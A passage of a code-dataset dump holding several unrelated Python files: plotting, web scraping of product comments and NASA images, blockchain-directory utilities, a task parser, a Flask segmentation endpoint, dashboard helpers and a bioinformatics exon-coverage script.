ax4.set_ylim(yg.min()-dy,yg.max()+dy) \n if params['224']['title'] == 'default':\n string = 'xyref = {0:.1f},{1:.1f}'.format(xref,yref) \n else:\n string = params['224']['title'] \n ax4.set_title(string,fontsize=fontsize)\n plt.tight_layout()\n if save:\n if container is None:\n raise ValueEror('container must be specified to save.')\n saveprefix = container.data['saveprefix']\n savefolder = container.data['savefolder']\n saveformat = container.data['plotformat']\n string = './{2}/{0}_overview.{1}'.format(saveprefix,saveformat,savefolder)\n plt.savefig(string,format=saveformat,bbox_inches='tight')\n print('Save {0}\\n'.format(string))\n\n\n","sub_path":"build/lib/hstgrism/show_overview.py","file_name":"show_overview.py","file_ext":"py","file_size_in_byte":6407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"308657146","text":"import urllib.request\nimport json\nimport time\nimport random\nimport pymysql.cursors\nimport pandas as pd \n\nproductNames = []\ncoms = []\ncontents = []\ndef crawlProductComment(url,page):\n\n #读取原始数据(注意选择gbk编码方式)\n html = urllib.request.urlopen(url).read().decode('gbk')\n\n #从原始数据中提取出JSON格式数据(分别以'{'和'}'作为开始和结束标志)\n jsondata = html[27:-2]\n #print(jsondata)\n data = json.loads(jsondata)\n\n #print(data['comments'])\n #print(data['comments'][0]['content'])\n #遍历商品评论列表\n for i in data['comments']:\n productName = i['referenceName']\n commentTime = i['creationTime']\n content = i['content']\n\n #输出商品评论关键信息\n print(\"商品全名:{}\".format(productName))\n print(\"用户评论时间:{}\".format(commentTime))\n print(\"用户评论内容:{}\".format(content))\n print(\"-----------------------------\")\n productNames.append(productName)\n coms.append(commentTime)\n contents.append(content)\n\n '''\n 数据库操作\n '''\n\n # #获取数据库链接\n # connection = pymysql.connect(host = 'localhost',\n # user = 'root',\n # password = '',\n # db = 'cmac',\n # charset = 'utf8mb4')\n # try:\n # #获取会话指针\n # with connection.cursor() as cursor:\n # #创建sql语句\n # sql = \"insert into `jd-mi6` (`productName`,`commentTime`,`content`) values (%s,%s,%s)\"\n\n # #执行sql语句\n # cursor.execute(sql,(productName,commentTime,content))\n\n # #提交数据库\n # connection.commit()\n # finally:\n # connection.close()\n\n\nfor i in range(0,100):\n print(\"正在获取第{}页评论数据!\".format(i+1))\n #小米6评论链接,通过更改page参数的值来循环读取多页评论信息\n url = 'https://club.jd.com/comment/productPageComments.action?callback=fetchJSON_comment98vv56668&productId=4335129&score=0&sortType=5&page=' + str(i) +'&pageSize=10&isShadowSku=0&fold=1'\n crawlProductComment(url,i)\n df2 = pd.DataFrame({'商品全名':productNames,'用户评论时间':coms,'用户评论内容':contents})\n df2.to_csv('a.csv')\n file_name = open('restxt.txt','w',encoding='utf-8')\n file_name.writelines(contents)\n file_name.close()\n #设置休眠时间\n # time.sleep(random.randint(31,33))","sub_path":"file2/pachong.py","file_name":"pachong.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"169231121","text":"\"\"\"\nutilities to help traverse the ICF blockchain with Python\n\n\n\"\"\"\nimport sys\nimport json\nimport os\ntry:\n from . import versions\nexcept ImportError:\n import versions\nimport itertools\n\n\n\"\"\" constants used below \"\"\"\nHASH = 'Hash' # key in the blockchain file's JSON object\nINHERITANCE = 'Inheritance' # key in the blockchain's JSON object\nFINGER_FILENAME = \"fingerprint.txt\" # the name of the fingerprint files\nTIMESTAMP = 'Timestamp' # the time stamp in the blockchain's JSON object\nICF_BLOCK_FILENAME = \"icfblock.block\" # the name of the blockchain files\nMETA_DIR = 'meta' # name of the \"meta\" directory\nDATA_DIR = 'data' # name of the \"data\" directory\n\nICF_TEST_DIR = os.path.join(\"ICF\", \"TEST\")\nICF_PROD_DIR = os.path.join(\"ICF\", \"PROD\")\nTEST = 'TEST'\nPROD = 'PROD'\n\n\ndef version_path_to_blockfile(version_path):\n \"\"\" given a path to a work product version directory, return\n the path to the icf blockfile \"\"\"\n return os.path.join(version_path, META_DIR, ICF_BLOCK_FILENAME)\n\ndef get_dirs(start_path):\n \"\"\" get a list of the directories in a path\"\"\"\n return list(a[0] for a in os.walk(start_path))\n\nclass Connection:\n \"\"\"\n a connection between two objects. Useful in building\n a force diagram in D3\n\n this relates a source to a target\n\n \"\"\"\n def __init__(self, source, target, value=1):\n self.source = source\n self.target = target\n self.value = value\n\n def __str__(self):\n return \"Connection(source={}, target={}, value={})\".format(\n self.source, self.target, self.value)\n \n def as_dict(self):\n return {\n \"source\":self.source, \n \"target\":self.target, \"value\":self.value}\n\ndef check_against_prod_path(in_path):\n \"\"\" if possible, swap TEST path for PROD\"\"\"\n if(ICF_TEST_DIR in in_path):\n prod = in_path.replace(\n ICF_TEST_DIR, ICF_PROD_DIR)\n if os.path.exists(prod):\n return prod\n return in_path \n\ndef check_against_test_path(in_path):\n \"\"\" if possible, swap PROD path for TEST\"\"\"\n if(ICF_PROD_DIR in in_path):\n test = in_path.replace(\n ICF_PROD_DIR, ICF_TEST_DIR)\n if os.path.exists(test):\n return test\n return in_path \n\nclass Block:\n \"\"\" represents a \"block\" in the blockchain \n \n \n corresponds to the contents of an ICF_BLOCK_FILENAME file\n\n\n the path is the path to the physical ICF blockchain file\n \"\"\"\n def __init__(self, path, hashkey, inheritance=[], timestamp=None):\n self.path = path\n self.hashkey = hashkey \n self.inheritance = inheritance \n self.timestamp = timestamp\n\n @classmethod\n def from_path(cls, filepath, rootpath=\"\"):\n \"\"\" read a block from the blockchain\n \n will first check if the QA version exists and will return that\n otherwise, will return the test version\n \n \"\"\"\n filepath = check_against_prod_path(filepath)\n\n with open(filepath, 'r') as f:\n d = json.load(f)\n p = []\n rootpath = os.path.dirname(filepath)\n\n\n for path in d[INHERITANCE]:\n\n path = check_against_prod_path(\n os.path.join(rootpath, path))\n p.append(cls.from_path(path))\n timestamp = d.get(TIMESTAMP, None) \n\n return cls(os.path.abspath(filepath), d[HASH].strip(), p,\n timestamp\n )\n\n def __itr_nodes(self,):\n \"\"\"returns an iterator over nodes\n \n note nodes is not unique because there may be\n multiple references to a node in the chain.\n\n use self.nodes() to get a unique list of nodes instead\n \"\"\"\n yield self.path\n for node in self.inheritance:\n yield from node.__itr_nodes()\n\n @property \n def nodes(self):\n \"\"\" obtain a list of all the [unique] nodes in the blockchain \"\"\"\n return list(set(self.__itr_nodes()))\n\n def __itr_connections(self, ):\n \"\"\" returns an iterator over connections\"\"\"\n for node in self.inheritance:\n yield Connection(source=self.path, target=node.path)\n yield from node.__itr_connections()\n\n @property \n def connections(self):\n \"\"\" obtain a list of all the connections in the blockchain \"\"\"\n return list(self.__itr_connections())\n\n def __str__(self):\n if(len(self.inheritance)>0):\n return \"[{}:{}]\".format(self.path,\n \" \".join(map(str, self.inheritance)))\n return \"[{}]\".format(self.path) \n\n\ndef get_fingerprint(filepath, sep=\"\\t\"):\n \"\"\"\n read the fingerprint from a valid fingerprint file\n\n \"\"\"\n with open(filepath, 'r') as f:\n lines = f.readlines()\n fingerline = lines[1]\n if \"Total\" not in fingerline:\n raise ValueError(\"Invalid fingerprint file\")\n return fingerline.split(sep)[1].strip() \n\ndef get_version(meta_folder_path):\n \"\"\" given a path to a meta folder, get the version number \"\"\"\n vstr = os.path.split(meta_folder_path)\n return versions.parse_version_str(vstr[-1])\n\n\ndef version_has_block(version_path):\n vp = os.path.abspath(version_path)\n return os.path.exists(os.path.join(vp, \n META_DIR, ICF_BLOCK_FILENAME))\n\nclass WorkProducts:\n \"\"\"\n represents all the work products in an ICF data structure\n\n path is the directory where work products are listed as\n folders\n\n this should be something like\n ...\\ICF\\Test\\\n or ...\\ICF\\Prod\\\n \"\"\"\n def __init__(self, path):\n self.path = path\n\n @property\n def all(self):\n l = lambda x: WorkProduct(x)\n paths = [os.path.abspath(os.path.join(self.path, i))\n for i in os.listdir(self.path)]\n return list(map(l, paths)) \n\n def __iter__(self):\n yield from self.all\n\n\nclass WorkProductVersion:\n \"\"\"\n Represents a particular version of a work product.\n\n This corresponds to an commited ICF work product.\n\n self.path should be the path to the version directory\n i.e\n\n ICF/{Test or Prod}/workproduct/\n /v1.2/ <--- this is \"path\" in constructor \n /data\n [data files go here]\n /meta\n [meta files go here, blockchain and fingerprint]\n \"\"\"\n def __init__(self, path):\n path = check_against_prod_path(path)\n if(ICF_TEST_DIR.upper() in path.upper())>0:\n self._QA = TEST\n elif(ICF_PROD_DIR.upper() in path.upper())>0:\n self._QA = PROD\n else:\n raise ValueError(\"'{}' Is not a valid ICF Path\".format(path))\n self.path = path\n\n @property\n def qa_status(self):\n return self._QA\n\n def __eq__(self, other):\n if (other.fingerprint==self.fingerprint):\n if(other.version_number==self.version_number):\n return True\n return False \n\n @property\n def other_versions_path(self):\n \"\"\" return path folder containing other versions of this\n work product version\n \"\"\"\n return os.path.abspath(os.path.join(self.path, \"..\"))\n\n @property\n def all_work_products_path(self):\n \"\"\"return path of folder containing ICF data structure\n (the \"work products\" directory)\n \"\"\"\n return check_against_test_path(\n os.path.abspath(os.path.join(\n self.other_versions_path, \"..\")))\n\n @property\n def meta_path(self):\n return os.path.join(self.path, META_DIR)\n \n @property\n def data_path(self):\n return os.path.join(self.PATH, DATA_DIR)\n\n @property\n def fingerprint_path(self):\n return os.path.join(self.meta_path, FINGER_FILENAME)\n\n @property\n def work_product_path(self):\n wpp, version = os.path.split(self.path)\n return wpp\n\n @property\n def block_path(self):\n return os.path.join(self.meta_path, ICF_BLOCK_FILENAME)\n\n @property\n def timestamp(self):\n return self.block.timestamp\n\n @property\n def version_number(self):\n return get_version(self.path)\n\n @property\n def version_str(self):\n return os.path.split(self.path)[-1]\n\n @property\n def fingerprint(self):\n return get_fingerprint(self.fingerprint_path)\n\n @property\n def block(self):\n \"\"\" obtain a Block instance from this version \"\"\"\n return Block.from_path(self.block_path)\n\n @property\n def work_product_name(self):\n return os.path.split(self.work_product_path)[1]\n\n @classmethod\n def from_block(cls, block):\n blockpath, blockfile = os.path.split(os.path.abspath(block.path))\n version_path, metadir = os.path.split(blockpath)\n return cls(version_path)\n\n def short_desc(self):\n outstr = \"{}\\t{}\\t{}\\t{}\".format(\n self.work_product_name,\n self.version_str, self.path, self.qa_status)\n return outstr\n\n def get_summary(self, sep=\" \"):\n block = self.block\n s = []\n for node in block.nodes:\n parent = WorkProductVersion.from_block(Block.from_path(node))\n s.append(sep.join([\n parent.work_product_name, parent.version_str, parent.path,\n parent.qa_status\n ]\n ))\n return \"\\n\".join(s)\n\n @classmethod\n def explain_version(cls, path):\n c = cls(path)\n outstr = \"Summary of '{}':\\n\\tQA Status = {}\\n{}\".format(\n path, c.qa_status, c.get_summary('\\t'))\n\n return outstr\n\n def _get_children_paths(self):\n \"\"\"\n traverse the directory structure and identify other\n work product versions which reference this one in\n their inheritance.\n \"\"\"\n all_products_path = self.all_work_products_path\n block_path = self.block.path\n work_products = WorkProducts(all_products_path)\n\n def temp(item):\n return item\n \n _versions = [[i.path for i in work_product.versions\n if (block_path in i.block.nodes)]\n for work_product in work_products]\n\n # remove \"this\" from the children and make a flat list \n x = list(set(itertools.chain(*\n [i for i in _versions if os.path.abspath(\n self.path)\n not in i]\n )))\n return x\n @property\n def children(self):\n return [WorkProductVersion(i) for i in self._get_children_paths()]\n\n @property\n def parents(self):\n items = [WorkProductVersion.from_block(Block.from_path(i))\n for i in self.block.nodes]\n # remove 'self' from the list of parents\n return [i for i in items if i !=self]\n\n\nclass WorkProduct:\n \"\"\"\n Represents an ICF Work Product. This is a class of work\n performed as part of the CA or CIE;\n\n Actual ICF work products correspond to WorkProductVersion\n instances. This class represents the collection of work\n product verions\n\n\n \"\"\"\n def __init__(self, path):\n if os.path.isdir(path):\n self.path = path\n return\n raise ValueError(\"'{}' is not a valid path\".format(path))\n\n def __str__(self, ):\n return os.path.split(self.path)[1]\n\n @property\n def versions(self, ):\n return [WorkProductVersion(\n os.path.abspath(os.path.join(self.path, version)))\n for version in os.listdir(self.path)\n if version_has_block(os.path.join(self.path, version))\n ]\n\n @property\n def most_recent_version(self, ):\n vlist = [(v.version_number, v) for v in self.versions]\n out = sorted(vlist, key=lambda x: x[0])\n try:\n return out[0][1]\n except IndexError:\n return None\n\n","sub_path":"pylib/backbone/backbone.py","file_name":"backbone.py","file_ext":"py","file_size_in_byte":11994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"389039185","text":"import datetime\nimport re\n\nimport source\nimport util\n\n\nclass Task(source.SourceLine):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._parse_source()\n\n @property\n def name(self):\n if not self.parent:\n return 'root'\n else:\n return self._parsed_source['name']\n\n @name.setter\n def name(self, name):\n self._set_source(name=name)\n\n # TODO: remove 'completed', pull apart into 'completed_self' and 'completed_defacto' or similar\n\n @property\n def completed_self(self):\n return self._parsed_source['completed']\n\n @property\n def completed_above(self):\n return self.completed_self or self.parent and self.parent.completed_above\n\n @property\n def completed_below(self):\n return self.completed_self or self.children and all(t.completed_below for t in self.children)\n\n @property\n def completed(self):\n return self.completed_above or self.completed_below\n\n @completed.setter\n def completed(self, completed):\n self._set_source(completed=completed)\n\n @property\n def weight(self):\n parsed_weight = self._parsed_source['weight']\n if parsed_weight is None:\n return 1\n else:\n return parsed_weight\n\n @weight.setter\n def weight(self, weight):\n self._set_source(weight=weight)\n\n @property\n def due_date(self):\n due_date = self._parsed_source['due_date']\n if due_date is None and self.parent:\n return self.parent.due_date\n else:\n return due_date\n\n @due_date.setter\n def due_date(self, due_date):\n self._set_source(due_date=due_date)\n\n @property\n def overdue(self):\n due_date_passed = self.due_date and self.due_date < datetime.datetime.today().date()\n return not self.completed and due_date_passed\n\n @property\n def description(self):\n return self._parsed_source['description']\n\n @description.setter\n def description(self, description):\n self._set_source(description=description)\n\n @property\n def _parsed_source(self):\n if not hasattr(self, '_attrs'):\n self._parse_source()\n return self._attrs\n\n def _parse_source(self):\n self._attrs = {}\n self._attrs['name'] = _TAG_PATTERN.sub(\n '', self.value.lstrip('*').strip())\n self._attrs['completed'] = self.value.startswith('*')\n\n for tag_type in _TAG_TYPE_PATTERNS:\n self._attrs[tag_type] = None\n for tag in _TAG_PATTERN.findall(self.value):\n for tag_type, (pattern, cons) in _TAG_TYPE_PATTERNS.items():\n if pattern.match(tag):\n self._attrs[tag_type] = cons(tag)\n break\n\n def _set_source(self, **kwargs):\n attrs = {**self._parsed_source, **kwargs}\n source_value = ''\n if attrs['completed']:\n source_value += '* '\n tags = ['weight', 'due_date', 'description']\n tag_strs = [\n f'[{attrs[tag]}]' for tag in tags if attrs[tag] is not None]\n source_value += attrs['name']\n source_value += ' '.join(tag_strs)\n self.value = source_value\n self._attrs = attrs\n\n def path(self, root=None, include_root=False):\n if self == root or self.parent is None:\n return [self] if include_root else []\n else:\n return self.parent.path(root, include_root) + [self]\n\n def depth(self, root=None, include_root=False):\n return len(self.path(root, include_root)) - 1\n\n def list(self, include_self=False):\n start = [self] if include_self else []\n return start + util.flatten(t.list(True) for t in self.children)\n\n @property\n def progress(self):\n if self.completed:\n return 1.0\n elif self.children:\n weight_total = sum(t.weight for t in self.children)\n weight_completed = sum(\n t.weight * t.progress for t in self.children)\n return weight_completed / weight_total\n else:\n return 0.0\n \n def __eq__(self, other):\n if not isinstance(other, Task):\n return NotImplemented\n return hash(self) == hash(other)\n\n def __hash__(self):\n return hash(self.value)\n\n def __repr__(self):\n if self.children:\n return f\"<'{self.name}':[{','.join(map(str, self.children))}]>\"\n else:\n return f\"'{self.name}'\"\n\n\ndef _parse_date(tag):\n return datetime.datetime.strptime(tag, '%d/%m/%y').date()\n\n\ndef _parse_weight(tag):\n try:\n return int(tag)\n except:\n w = float(tag)\n if w.is_integer:\n return int(w)\n else:\n return w\n\n\n_TAG_PATTERN = re.compile(r'\\[(.*?)\\]\\s?')\n_TAG_TYPE_PATTERNS = {\n 'weight': (re.compile(r'^\\d*\\.?\\d+$'), _parse_weight),\n 'due_date': (re.compile(r'^\\d+/\\d+/\\d+$'), _parse_date),\n 'description': (re.compile(r'^.+$'), str)\n}\n","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"609162815","text":"H, W, m = map(int, input().split())\nxs = [0] * H\nys = [0] * W\ns = set()\nfor _ in range(m):\n h, w = map(int, input().split())\n h -= 1\n w -= 1\n xs[h] += 1\n ys[w] += 1\n s.add((h, w))\n\nmx = max(xs)\nmy = max(ys)\nmxs = set()\nfor i in range(H):\n if xs[i] == mx:\n mxs.add(i)\nmys = set()\nfor i in range(W):\n if ys[i] == my:\n mys.add(i)\nfor x in mxs:\n for y in mys:\n if not (x, y) in s:\n print(mx + my)\n exit()\nprint(mx + my - 1)\n","sub_path":"python/abc176/e/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"240952415","text":"import os\nimport sys\n\nimport cv2\nimport numpy as np\nimport torch\nimport segmentation_models_pytorch as smp\nfrom torch.autograd import Variable\n\nROOT_DIR = os.path.abspath(os.path.join('..'))\nsys.path.append(ROOT_DIR)\n\nfrom flask import Flask, jsonify, make_response, send_file\n\nDEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\n# MODEL_PATH = os.path.join('models', 'celeba_mask_hq-psp-mobilenet_v2.pth')\nMODEL_PATH = os.path.join('models', 'celeba_mask_hq-psp-densenet121.pth')\n\nmodel = torch.load(MODEL_PATH, map_location=torch.device(DEVICE))\n\n# print(model)\nmodel.eval()\n\napp = Flask(__name__)\n\n\ndef blur(img_path):\n test_img = cv2.imread(img_path)\n test_img = cv2.cvtColor(test_img, cv2.COLOR_BGR2RGB)\n test_img = torch.from_numpy(test_img).to(DEVICE)\n test_img = Variable(test_img.float())\n test_img = test_img.unsqueeze(0).permute((0, 3, 1, 2))\n\n out_name = os.path.join('assets', 'test_out.png')\n out_img = model.predict(test_img)\n out_img = np.argmax(out_img.squeeze().permute(1, 2, 0).cpu().numpy(), axis=2) * 60\n cv2.imwrite(out_name, out_img)\n\n return out_name\n\n\n# @app.route('/predict', methods=['POST'])\n@app.route('/predict')\ndef predict():\n print('predicting...')\n img_path = os.path.join('assets', 'images.jpg')\n print('predicting ended.')\n return send_file(blur(img_path), mimetype='image/png')\n # return response\n # return jsonify({'class_id': test_img})\n\n\nif __name__ == \"__main__\":\n app.run(\n host='0.0.0.0',\n port=2080,\n debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"42551605","text":"# From https://apod.nasa.gov/apod/archivepix.html follow each link, find the image in that link and download it\n\n# Need to research:\n# 1) Download something from the internet => urllib.request\n# 2) Interpret HTML to parse and find images => BeautifulSoup\nimport urllib.request\nfrom urllib.parse import urljoin\nfrom bs4 import BeautifulSoup\nimport os\n\n# Strategy\n# 1) Download the index from URL\nbase_url = \"https://apod.nasa.gov/apod/archivepix.html\"\ndownload_directory = \"apod_pictures\"\ncontent = urllib.request.urlopen(base_url).read()\n\n# Set a limit on number of entries, for debugging purposes.\ndebug = True\nlimit = 30\n\n# 2) For each link...\nfor link in BeautifulSoup(content, \"lxml\").findAll(\"a\"):\n href = urljoin(base_url, link[\"href\"])\n\n if debug and limit <= 0:\n break\n\n print(\"Following link:\", href)\n\n # ...follow the link and download the image on that linked page\n content = urllib.request.urlopen(href).read()\n for img in BeautifulSoup(content, \"lxml\").findAll(\"img\"):\n img_href = urljoin(href, img[\"src\"])\n\n print(\"Downloading:\", img_href)\n img_name = img_href.split(\"/\")[-1]\n urllib.request.urlretrieve(img_href, os.path.join(download_directory, img_name))\n\n if debug:\n limit -= 1\n if limit <= 0:\n break\n\n","sub_path":"intermediate_python_programming/nasa_apod/base_scraping.py","file_name":"base_scraping.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"402590216","text":"import pytz, jwt\nfrom datetime import datetime\nfrom calendar import monthrange\nfrom jaeger_client import Config\n\nbusmask_names = 'Mon Tue Wed Thu Fri'\nweekmask_names = 'Sat Sun'\n\nlocal = pytz.timezone(\"Asia/Jakarta\")\n\nmax_time_presence = datetime.strptime('07:30:59', '%H:%M:%S').time()\n\ndef keys_redis(user_id, key): return '%s-%s' % (user_id, key)\n\ndef parse_datetime(date):\n return datetime.strptime(date, '%Y-%m-%dT%H:%M:%SZ')\n\ndef last_day_of_month(date_value):\n return date_value.replace(day = monthrange(date_value.year, date_value.month)[1])\n\ndef arrayPresence(totalNoPresence=0,precentageNoPresence=0,totalPresence=0,precentagePresence=0,totalPresenceWeekend=0,precentagePresenceWeekend=0,totalLatePresence=0,precentageLatePresence=0):\n data = {\n 'total_no_presence': totalNoPresence,\n 'precentage_no_presence': precentageNoPresence,\n 'total_presence': totalPresence,\n 'precentage_already_presence': precentagePresence,\n 'total_weekend_presence': totalPresenceWeekend,\n 'precentage_weekend_presence': precentagePresenceWeekend,\n 'total_late_presence': totalLatePresence,\n 'precentage_late_presence': precentageLatePresence,\n }\n return data\n\ndef arrayPermit(permit=0, precentagePermit=0):\n data = {\n 'total_permit': permit,\n 'precentage_total_permit': precentagePermit,\n }\n return data\n\ndef arrayLocationUser(totalWfo=0,precentageWfo=0,totalWfh=0,precentageWfh=0,totalPerjadin=0,precentagePerjadin=0):\n data = {\n 'total_wfo': totalWfo,\n 'precentage_wfo': precentageWfo,\n 'total_wfh': totalWfh,\n 'precentage_wfh': precentageWfh,\n 'total_perjadin': totalPerjadin,\n 'precentage_perjadin': precentagePerjadin,\n }\n return data\n\ndef arrayReportUser(totalReportYear=0, totalReportMonth=0):\n data = {\n 'total_report_year': totalReportYear,\n 'total_report_month': totalReportMonth,\n }\n return data\n\ndef arrayOfficeHourUser(totalOfficeHourYear=0, totalOfficeHourMonth=0):\n data = {\n 'total_office_hour_year': round(totalOfficeHourYear, 2),\n 'total_office_hour_month': round(totalOfficeHourMonth, 2),\n }\n return data\n\ndef decode_auth_token(secret_key, auth_token):\n try:\n payload = jwt.decode(auth_token, secret_key)\n return payload\n except jwt.ExpiredSignatureError:\n return 401\n except jwt.InvalidTokenError:\n return 401\n\ndef config_jaeger(jaeger_host, jaeger_port):\n config = Config(\n config={ # usually read from some yaml config\n 'sampler': {\n 'type': 'const',\n 'param': 1,\n },\n 'local_agent': {\n 'reporting_host': jaeger_host,\n 'reporting_port': jaeger_port,\n },\n 'logging': True,\n },\n service_name='dashboard-attendance-user-api',\n validate=True,\n )\n return config\n ","sub_path":"service-python/dashboardUser/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"635898365","text":"\"\"\"\n\nYou are given a directed graph with N vertices.Each vertex of the given graph can have multiple incoming edges but it must have a single outgoing edge.\n\nIf the vertex doesnt have an outgoing edge then it is indicated with -1.Two vertices v1 and v2 are given in which the task is to find \n\nthe nearest meeting vertex of both vertices.(The nearest vertex that have path from both v1 and v2).If no such vertex exists print -1\n\nInput:\n\nFirstline consists of number of vertices v\nSecondline has an edge array in which vertex i points to vertex edge[i]\nNextline contains two vertices v1 and v2\n\nOutput:\n\nprint the nearest meeting vertex from v1 and v2\n\nExample 1:\n\nInput:\n\n5\n1 -1 1 2 3\n0 2\n\nOutput:\n\n1\n\nExample 2:\n\nInput:\n\n4\n2 -1 3 -1\n2 3\n\nOutput:\n \n 3\n\n\"\"\"\ndef addEdge(s,d,g):\n g[s]=d\ndef Dfsutil(g,c1,visited):\n visited[c1]=True\n while g[c1]!=-1 and g[c1]!=True:\n c1=g[c1]\n visited[c1]=True\n \ndef nearestMeeting(g,c1,c2):\n visited=[False]*len(g)\n Dfsutil(g,c1,visited)\n \n if visited[c2]==True:\n return c2\n while g[c2]!=-1 and g[c2]!=True:\n c2=g[c2]\n if visited[c2]==True:\n return c2\n return -1\n \n\nv=int(input())\ng=[-1]*v\ne=list(map(int,input().split()))\nfor i in range(len(e)):\n addEdge(i,e[i],g)\nc1,c2=map(int,input().split())\nprint(nearestMeeting(g,c1,c2))\n","sub_path":"nearestmeetingcell.py","file_name":"nearestmeetingcell.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"40917767","text":"\nimport subprocess\nimport sys\n\nbam_files = sys.argv[1:]\n\ngene_files = [\"ALK\", \"NRG1\", \"RET\", \"NTRK3\", \"ROS1\"]\noutfile = open(\"Results/RNA/Imbalance/imbalance_all_gene.txt\", \"w\")\noutfile2 = open(\"Results/RNA/Imbalance/imbalance_called_gene.txt\", \"w\")\noutfile.write(\"Sample\\tgene\\t3'/5'-ratio\\tCoverage\\tNorm_Coverage\\tImbalance\\n\")\noutfile2.write(\"Sample\\tgene\\t3'/5'-ratio\\tCoverage\\tNorm_Coverage\\n\")\n\nbam_dict = {}\nfor bam in bam_files :\n print(\"samtools idxstats \" + bam + \" | awk -F '\\t' '{s+=$3}END{print s}' > nr_reads.txt\")\n #subprocess.call(\"samtools index \" + bam, shell=True)\n subprocess.call(\"samtools idxstats \" + bam + \" | awk -F '\\t' '{s+=$3}END{print s}' > nr_reads.txt\", shell=True)\n nr_bam_file = open(\"nr_reads.txt\")\n nr_reads = 0\n for line in nr_bam_file :\n nr_reads = int(line.strip()) / 10000000.0\n bam_dict[bam] = nr_reads\n nr_bam_file.close()\n\nsubprocess.call(\"mkdir exon_coverage\", shell = True)\nexon_result_dict = {}\nfor bam in bam_files :\n exon_result_dict[bam] = {}\n print(bam)\n print(bam_dict[bam])\n #sample = bam.split(\"/\")[-1].split(\"Aligned\")[0]\n sample = bam.split(\"/\")[-1].split(\".bam\")[0]\n for gene in gene_files :\n exon_result_dict[bam][gene] = []\n print(gene)\n gene_file = open(\"DATA/\" + gene + \"_exons.txt\")\n exon_list = []\n for line in gene_file :\n lline = line.strip().split(\"\\t\")\n chrom = lline[0]\n start_pos = lline[1]\n end_pos = lline[2]\n exon = lline[3]\n exon_list.append([exon, chrom, start_pos, end_pos])\n #print(exon, chrom, start_pos, end_pos)\n print(\"samtools depth -d 100000 -aa -r \" + chrom + \":\" + str(start_pos) + \"-\" + str(end_pos) + \" \" + bam + \" > exon_coverage/\" + exon + \".txt\")\n subprocess.call(\"samtools depth -d 100000 -aa -r \" + chrom + \":\" + str(start_pos) + \"-\" + str(end_pos) + \" \" + bam + \" > exon_coverage/\" + exon + \".txt\", shell=True)\n exon_result_dict[bam][gene].append(exon_list)\n avg_depth_list = []\n i = 0\n for exon in exon_list :\n exon_file = open(\"exon_coverage/\" + exon[0] + \".txt\")\n avg_depth = 0\n nr_pos = 0\n for line in exon_file :\n lline = line.strip().split(\"\\t\")\n chrom = lline[0]\n pos = lline[1]\n avg_depth += int(lline[2])\n nr_pos += 1\n avg_depth /= float(nr_pos)\n avg_depth_list.append(avg_depth)\n exon_result_dict[bam][gene][0][i].append(avg_depth)\n i += 1\n exon_file.close()\n\n outfile.write(sample + \"\\t\" + gene + \"\\t\")\n gene_start = 1\n gene_end = 1\n coverage = 0\n i = 0\n '''ALK'''\n if gene == \"ALK\" :\n for d in avg_depth_list :\n if i <= 7 :\n gene_start += d / bam_dict[bam]\n elif i >= 8 :\n gene_end += d / bam_dict[bam]\n if i >= 8 :\n coverage += d / bam_dict[bam]\n i += 1\n gene_start /= 8.0\n gene_end /= 8.0\n coverage /= 8.0\n imbalance = gene_end / gene_start\n outfile.write(str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\t\")\n if imbalance > 35.0 and coverage > 1000.0 :\n #if imbalance > 25.0 and coverage > 40.0 :\n outfile.write(\"Imbalance\" + \"\\n\")\n outfile2.write(sample + \"\\t\" + gene + \"\\t\" + str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\n\")\n else :\n outfile.write(\"\" + \"\\n\")\n '''NRG1'''\n if gene == \"NRG1\" :\n for d in avg_depth_list :\n if i <= 7 :\n gene_start += d / bam_dict[bam]\n elif i >= 8 :\n gene_end += d / bam_dict[bam]\n if i >= 8 :\n coverage += d / bam_dict[bam]\n i += 1\n gene_start /= 8.0\n gene_end /= 6.0\n coverage /= 6.0\n imbalance = gene_end / gene_start\n outfile.write(str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\t\")\n if imbalance > 1.0 and coverage > 0.0 :\n outfile.write(\"Imbalance\" + \"\\n\")\n outfile2.write(sample + \"\\t\" + gene + \"\\t\" + str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\n\")\n else :\n outfile.write(\"\" + \"\\n\")\n '''RET'''\n if gene == \"RET\" :\n for d in avg_depth_list :\n if i <= 8 :\n gene_start += d / bam_dict[bam]\n elif i >= 9 :\n gene_end += d / bam_dict[bam]\n if i >= 9 :\n coverage += d / bam_dict[bam]\n i += 1\n gene_start /= 9.0\n gene_end /= 9.0\n coverage /= 9.0\n imbalance = gene_end / gene_start\n outfile.write(str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\t\")\n if imbalance > 3.0 and coverage > 500.0 :\n outfile.write(\"Imbalance\" + 